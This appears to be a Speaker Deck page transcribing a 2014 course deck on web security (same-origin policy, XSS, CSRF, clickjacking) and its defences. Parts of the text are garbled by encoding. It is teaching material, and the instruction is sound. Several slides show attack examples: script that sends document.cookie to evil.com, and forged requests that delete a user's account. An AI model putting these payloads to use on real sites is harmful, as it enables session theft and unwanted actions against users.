Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Selected Topics on Website Security @ 102-2 CCSP
Search
Johnson Liang
May 29, 2014
Technology
1
450
Selected Topics on Website Security @ 102-2 CCSP
Concept of Same Origin Policy, XSS, CSRF & Clickjacking
Johnson Liang
May 29, 2014
Tweet
Share
More Decks by Johnson Liang
See All by Johnson Liang
Political Promise Tracker 政治承諾追蹤網 g0v-hackath14n 提案
mrorz
0
200
群眾協作的一些事—— 「自經區正反意見比較表」到 「臺北市長選舉承諾一覽表」到 「PPT 政治承諾追蹤網」
mrorz
0
410
Political Promise Tracker 政治承諾追蹤網 g0v-hackath12n 提案
mrorz
0
800
[Thesis Defense] SeeSS: Instant Change Impact Visualization for CSS developers
mrorz
0
260
g0v-hackath10n 提案 -- 2014 台北市長政見比較表
mrorz
0
250
網路及平台服務程式設計及零時政府 @ 創新網路技術推廣說明會
mrorz
0
160
g0v-hackath9n 提案 -- 自經區正反意見比較表
mrorz
0
120
CCSP 2014 期末成果展行前須知
mrorz
0
390
Google Analytics @ 102-2 CCSP
mrorz
0
320
Other Decks in Technology
See All in Technology
DroidKaigi 2025 Androidエンジニアとしてのキャリア
mhidaka
2
390
株式会社ログラス - 会社説明資料【エンジニア】/ Loglass Engineer
loglass2019
4
65k
機械学習を扱うプラットフォーム開発と運用事例
lycorptech_jp
PRO
0
660
react-callを使ってダイヤログをいろんなとこで再利用しよう!
shinaps
2
270
下手な強制、ダメ!絶対! 「ガードレール」を「檻」にさせない"ガバナンス"の取り方とは?
tsukaman
2
460
バイブスに「型」を!Kent Beckに学ぶ、AI時代のテスト駆動開発
amixedcolor
3
590
Claude Code でアプリ開発をオートパイロットにするためのTips集 Zennの場合 / Claude Code Tips in Zenn
wadayusuke
5
1.8k
Codeful Serverless / 一人運用でもやり抜く力
_kensh
7
450
AIエージェント開発用SDKとローカルLLMをLINE Botと組み合わせてみた / LINEを使ったLT大会 #14
you
PRO
0
130
LLMを搭載したプロダクトの品質保証の模索と学び
qa
1
1.1k
20250913_JAWS_sysad_kobe
takuyay0ne
2
250
要件定義・デザインフェーズでもAIを活用して、コミュニケーションの密度を高める
kazukihayase
0
120
Featured
See All Featured
The Power of CSS Pseudo Elements
geoffreycrofte
77
6k
Bash Introduction
62gerente
615
210k
The Straight Up "How To Draw Better" Workshop
denniskardys
236
140k
How GitHub (no longer) Works
holman
315
140k
Typedesign – Prime Four
hannesfritz
42
2.8k
Statistics for Hackers
jakevdp
799
220k
Optimising Largest Contentful Paint
csswizardry
37
3.4k
Raft: Consensus for Rubyists
vanstee
140
7.1k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
162
15k
Scaling GitHub
holman
463
140k
Rails Girls Zürich Keynote
gr2m
95
14k
We Have a Design System, Now What?
morganepeng
53
7.8k
Transcript
Selected Topics on Website Security Concept of Same Origin Policy,
XSS, CSRF & Clickjacking MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
খࢿ҆શલি Concept of Same Origin Policy, XSS, CSRF & Clickjacking
MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
Same-Origin Policy ಉݯࡦ
ᖣ᧸ث࠷֩৺࠷جຊత҆શޭೳʜʜ 8FCੋݐߏࡏಉݯࡦతجૅ೭্తɻ – 吳翰清 ❝ ❞
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
㑌ݸᖣ᧸ث။ɿ
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
एᔒ༗ಉݯࡦɿ
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
Upon visiting http://evil.mobile.org : $.get(‘http://facebook.com’, {}, function(data){ // 未經允許就得到你的 Facebook 塗鴉牆 }, ‘html’); एᔒ༗ಉݯࡦɿ
https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript host, port & protocol Same Origin Different Origin
༬ઃڋ㘺ލҬ፤ࢿྉ Լྻҝಛྫ
ಛྫҰɿՄލҬࡌೖࢿݯ೭ඪត • <script> • <img> • <iframe> • <link> •
Javascript 無從讀寫其內容
ಛྫೋɿ$SPTT0SJHJO 3FTPVSDF4IBSJOH $034 • Origin request header • Access-Control-Allow-XXX response
header • Enabling cross-origin ajax, web font, WebGL & canvas
Cross-Site Scripting (XSS)
ࢦ᱆٬ಁաʮ)5.-২ೖʯ篡վྃทɼᎎೖྃ ዱҙతࢦྩߘɼਐҰ㑊ࡏ༻ऀᖣ᧸ท࣌ɼ߇ ੍༻ऀᖣ᧸ثతҰछ߈㐝ɻ – 吳翰清 ❝ ❞
<section class="intro"> <%- user.desc %> </section> Your site : Example
#1 ༻ऀ ༌ೖత)5.-
<section class="intro"> <p>Hello</p> <p>I am Johnson</p> </section> Your site :
Example #1
<section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script>
</section> Your site : Example #1 ፨๚ࠑ༻㖽ท໘తਓɼDPPLJF။ඃFWJMDPN䫖
<script type="text/javascript"> var pageTitle = "<%= userPage.title %>"; </script> Your
site : Example #2 ༻ऀࣗ༝༌ೖతࣈ۲
<script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script> Your
site : Example #2 ፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖
$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!</h1>
$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>
Ṝछ߈㐝తࣔൣҊྫੋލҬతɼॴҎڣ z$SPTTz 4JUF 4DSJQUJOHɻᚙల౸ࠓఱɼੋ൱ލҬቮៃෆ ࠶ॏཁɼ944Ṝݸ໊ࣈჟҰอཹྃԼိɻ – 吳翰清 ❝ ❞
ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });
༬ઃଖመबੋUSVF
ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });
༬ઃଖመबੋUSVF
ڔํࣜ HTML 輸出檢查 — 盡量不⽤用 <%- %> <section class="intro"> <%=
user.desc %> </section>
ڔํࣜ HTML 輸出檢查 — Caja-HTML-Sanitizer // Controller ! var sanitizer
= require('sanitizer'); sanitizedIntro = sanitizer.sanitize(user.desc); ! <!-- View --> <section class="intro"> <%- sanitizedIntro %> </section> อཹແత)5.-UBHT
ڔํࣜ Javascript 輸出檢查 — ⽤用現成 JSON.stringify <script type="text/javascript"> var page
= <%- JSON.stringify({ title: userPage.title }) %>; </script>
ڔํࣜ DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…) 或先 sanitize
想插⼊入的 HTML. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });
Cross-Site Request Forgery (CSRF/XSRF)
Your site : Example #4 // Delete current user account
app.get('/user/delete', userCtrl.delete);
evil.com : Example #4 <img src="http://yoursite.com/user/delete"> ፨๚ࠑFWJMTJUFతਓɼ౸ྃ વޙ䭪ʗଞࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ
߈㐝ऀᷮᷮ༠ಋ༻ऀ๚ྃҰݸท໘ɼबҎ֘ ༻ऀతɼࡏZPVSTJUFDPNཫࣥߦྃҰ࣍ૢ ࡞ʜʜṜछ SFRVFTU ੋ߈㐝ऀॴِతɼॴҎ ڣz$SPTTTJUF3FRVFTU'PSHFSZzɻ – 吳翰清 ❝ ❞
<iframe src="https://mail.google.com/mail/u/0/?logout"> Demo:cryptogasm.com/gmail-logout.html
evil.com : Example #5 ፨๚FWJMTJUFޙɼ༻ऀࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ <form action="http://yoursite.com/user/delete" method="post" id="evil-form"> </form>
! <script type="text/javascript"> $('#evil-form').submit(); </script>
ڔํࣜ • CSRF 攻擊成功的要素:request 的所有參數都可以被 攻擊者猜測到。 • Anti-CSRF Token:使攻擊者無法拼湊正確 request。
ڔํࣜ
ڔํࣜ
ڔํࣜ දᄸૹग़ޙɼޙDPOUSPMMFS။ᒾ查දᄸత UPLFOੋ൱ᢛDPPLJFதతUPLFO૬ූɼ एෆҰᒬɼबෆ၏ࣄɻ
ڔํࣜ http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3 // Express settings ! app.use(express.cookieParser('optional secret string')); app.use(express.session());
app.use(express.csrf()); app.use(function (req, res, next) { res.locals.csrftoken = req.csrfToken(); next(); }); ! ! ! <!-- View --> ! <form action="..." method="post"> <input type="hidden" name="_csrf" value="<%= csrftoken %>"> </form> ᩋTFTTJPOཫతBOUJDTSGUPLFO ࡏWJFXཫೳ፤ಘ౸
Clickjacking
Jeremiah Grossman and Robert Hansen, 2008
http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use
None
ڔํࣜ w ᩋ㟬తෆඃ࠹ਐJGSBNFཫ • x-frame-options: deny w IUUQTHJUIVCDPNFWJMQBDLFUIFMNFU Can’t be
your site!
http://youtu.be/VRCUpXLguHM 吳翰清 著
http://youtu.be/VRCUpXLguHM 吳翰清 著